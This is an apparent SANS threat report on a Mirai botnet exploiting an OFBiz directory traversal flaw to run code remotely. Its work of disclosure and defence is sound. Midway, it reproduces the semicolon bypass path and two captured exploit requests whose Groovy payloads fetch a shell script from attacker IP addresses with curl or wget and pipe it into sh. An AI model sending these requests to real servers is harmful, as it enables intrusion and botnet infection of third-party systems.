Enterprise resource planning (ERP) software is at the core of many businesses, supporting human resources, accounting, shipping, and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make them difficult to patch. Yet critical vulnerabilities continue to affect these systems, putting critical business data at risk.
The SANS Internet Storm Center has published a report indicating that the open source ERP framework OFBiz is currently being targeted by a new type of Mirai botnet.
As part of its broader portfolio of projects, the Apache Foundation supports OFBiz, a Java-based framework for creating Enterprise Resource Planning (ERP) applications. OFBiz has not seen as much adoption as commercial alternatives. However, like any ERP system, organizations rely on OFBiz for sensitive business data, and the security of these ERP systems is extremely important.
In May of this year, a critical security update was released for OFBiz that fixed a directory traversal vulnerability that could lead to remote command execution. Versions of OFBiz prior to 18.12.13 were affected. A few weeks later, details of the vulnerability were made public.
Directory traversal, or path traversal, vulnerabilities can be used to circumvent access control rules. For example, if a user has access to the “/public” directory but not the “/admin” directory, an attacker can use a URL such as “/public/../admin” to circumvent the access control logic. Recently, CISA and the FBI released an alert focused on directory traversal as part of their “Secure by Design” initiative. CISA noted that they currently track 55 directory traversal vulnerabilities as part of their “Known Exploited Vulnerabilities” (KEV) catalog.
In the case of OFBiz, the directory traversal is easily initiated by inserting a semicolon. All an attacker needs to do is find a URL they have access to and append the restricted URL after the semicolon. Currently observed exploit URLs are:
/webtools/control/forgotPassword;/ProgramExport
‘forgotPassword’ does not require authentication because users should be able to reset their passwords without having to log in first. ‘ProgramExport’, on the other hand, should be access controlled and not accessible unless a user is logged in. ‘ProgramExport’ is particularly dangerous in that it allows arbitrary code execution. There was a flaw in OFBiz’s logic that stopped evaluating the URL at the semicolon. This allowed any user who was not logged in to access the second part of the URL, ‘/ProgramExport’.
An attacker would need to use a POST request to exploit the vulnerability, but a request body is not necessary – instead, a URL parameter would work fine.
The SANS Internet Storm Center uses an extensive honeypot network to detect attempts to exploit various web application vulnerabilities. Significant new exploitation attempts are summarized in “First Seen” reports. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the directory traversal vulnerability mentioned above by OFBiz, which was quickly picked up in the “First Seen” report.
The exploit attempts originated from two different IP addresses that are also associated with various attempts to exploit IoT devices, and are commonly associated with various flavors of the current “Mirai” botnet.
The criminals used two different exploits: In the first exploit, they used a URL to include the command that the exploit was intended to execute.
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
The second used the request body for the command, which is more common for “POST” requests.
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (victim IP address)
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Unfortunately, neither the ‘bin.sh’ nor the ‘sh’ script was recovered. The IP address was scanned on July 29th using the user agent ‘KrebsOnSecurity’ in honor of infosec blogger Brian Krebs. However, the URLs scanned were primarily parasitic, looking for existing web shells left behind from previous attacks. The IP address was also used to deliver a file called ‘botx.arm’, a filename commonly associated with Mirai variants.
We’ve been waiting for scans exploiting the OFBiz vulnerability since it was announced in May. It’s easy to exploit, and while the number of vulnerable and at-risk users is small, it hasn’t deterred attackers so far. But attackers are at least experimenting, and it’s possible they could add the vulnerability to bots like the Mirai variant.
There are a few IPs involved:
- 95.214.27.196: Sending exploits as URL parameters and hosting malware.
- 83.222.191.62: Sending an exploit as the request body. The malware is hosted on 185.196.10.231. In early July, this IP was scanned for IoT vulnerabilities.
- 185.196.10.231: Hosts malware
If you found this article interesting and would like to dive deeper into the world of securing web applications, APIs, and microservices, you can join me for my course SEC522 at Network Security 2024 (September 4-9). You can find all the content offered at the event here.
